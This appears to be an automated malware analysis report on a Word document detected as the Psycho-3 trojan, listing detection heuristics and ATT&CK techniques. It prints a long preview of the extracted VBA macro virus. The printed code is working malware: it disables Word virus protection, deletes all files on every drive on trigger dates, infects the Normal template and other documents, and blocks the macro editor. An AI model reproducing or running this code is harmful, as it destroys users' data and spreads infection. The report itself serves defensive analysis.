MALICIOUS
208
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1485 Data Destruction
The sample is identified as Win.Trojan.Psycho-3 by ClamAV. It contains VBA macros, including AutoOpen and AutoClose, which are designed to execute the 'Apocalypse' subroutine. This subroutine iterates through all available drive letters and attempts to delete all files found on them, followed by displaying a "The Apocalypse has come to You!" message. The script also attempts to modify the Word security level registry key.
Heuristics 6
-
ClamAV: Win.Trojan.Psycho-3 critical CLAMAV_DETECTIONClamAV detected this file as malware: Win.Trojan.Psycho-3
-
Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUSOLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Auto_Close macro high OLE_VBA_AUTOCLOSEAuto_Close macro
-
Environ() call (env variable access) low OLE_VBA_ENVIRONEnviron() call (env variable access)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 19942 bytes |
SHA-256: 857740abb6fad5295bbca570559cf756eefa5f7c370f41f9e42e570e8341d6e1 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "Apocalypse"
Public I As Integer
Sub Apocalypse()
On Error Resume Next
For k = 67 To 90
drive = Chr(k) & ":\"
With Application.FileSearch
.NewSearch: .LookIn = drive: .SearchSubFolders = (True Or False)
.FileName = "*.*": .MatchTextExactly = (True And False):
.FileType = msoFileTypeAllFiles
If .Execute > 0 Then
For I = 1 To .FoundFiles.Count: Kill .FoundFiles(I): Next I
End If
End With
Next k
MsgBox "The Apocalypse has come to You!", vbCritical + vbOKOnly, ""
End Sub
Sub AutoOpen()
On Error Resume Next
Options.ConfirmConversions = (True And False)
Options.VirusProtection = (True And False)
Options.SaveNormalPrompt = (True And False)
Application.DisplayAlerts = wdAlertsNone
If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") <> "" Then
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
End If
ExecuteApocalypse
End Sub
Sub AutoClose()
On Error Resume Next
If InStr(1, ActiveDocument.FullName, "\", vbTextCompare) <> 0 Then ExecuteApocalypse
End Sub
Sub FileSaveAs()
On Error Resume Next
ExecuteApocalypse
Dialogs(wdDialogFileSaveAs).Show
End Sub
Sub viewvbcode()
On Error Resume Next
MsgBox "Sorry, access denied.", vbExclamation + vbOKOnly, "Unexpected error..."
ShowVisualBasicEditor = 0 'h
End Sub
Sub ToolsMacro()
MsgBox "Sorry, access denied.", vbExclamation + vbOKOnly, "Unexpected error..."
End Sub
Sub filetemplates()
MsgBox "Sorry, access denied.", vbExclamation + vbOKOnly, "Unexpected error..."
End Sub
Function CheckForApocalypse() As Byte
On Error Resume Next
CheckForApocalypse = 0
For Each Item In NormalTemplate.VBProject.VBComponents
If Item.Name = "Apocalypse" Then If Integrity(2) Then CheckForApocalypse = 1
Next
For Each Item In ActiveDocument.VBProject.VBComponents
If Item.Name = "Apocalypse" Then If Integrity(1) Then CheckForApocalypse = CheckForApocalypse + 2
Next
End Function
Sub ExecuteApocalypse()
Dim stat As Byte
On Error Resume Next
stat = CheckForApocalypse
Select Case stat
Case 1
DocInfecting
Case 2
NormInfecting
End Select
If Day(Now()) = 1 Or Day(Now()) = 13 Or Day(Now()) = 26 Or Month(Now()) = 4 Then Apocalypse
End Sub
Private Sub DocInfecting()
Dim Infect As Boolean
On Error Resume Next
For Each Item In ActiveDocument.VBProject.VBComponents
If Item.Name = "Apocalypse" Then
With ActiveDocument.VBProject.VBComponents.Item("Apocalypse")
.CodeModule.DeleteLines 1, .CodeModule.CountOfLines
.CodeModule.InsertLines 1, NormalTemplate.VBProject.VBComponents.Item("Apocalypse").CodeModule.Lines(1, 129)
If Left$(ActiveDocument.FullName, 1) > "B" And Not ActiveDocument.Saved Then ActiveDocument.Save
Exit Sub
End With
End If
Next
NormalTemplate.VBProject.VBComponents.Item("Apocalypse").Export Environ("windir") + "\Kill.bmp"
ActiveDocument.VBProject.VBComponents.Import Environ("windir") + "\Kill.bmp"
Kill Environ("windir") + "\Kill.bmp"
If Left$(ActiveDocument.FullName, 1) > "B" And Not ActiveDocument.Saved Then ActiveDocument.Save
End Sub
Private Sub NormInfecting()
On Error Resume Next
KillAllObjectsInNormal
Application.OrganizerCopy ActiveDocument.FullName, NormalTemplate.FullName, "Apocalypse", wdOrganizerObjectProjectItems
SetAttr NormalTemplate.FullName, vbNormal
If NormalTemplate.Saved = False Then NormalTemplate.Save
End Sub
Private Sub KillAllObjectsInNormal()
On Error Resume Next
With NormalTemplate.VBProject.VBComponents
For I = .Count To 2 Step -1
.Item(I).CodeModule.DeleteLines 1, .Item(I).CodeModule.CountOfLines
.Remove .Item(I)
Next I
.Item(1).CodeModule.DeleteLines 1, .Item(1).CodeModule.CountOfLines
End With
End Sub
Private Function Integrity(m As Byte) As Boolean
On Error Resume Next
Dim s As String
Dim l As Variant
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.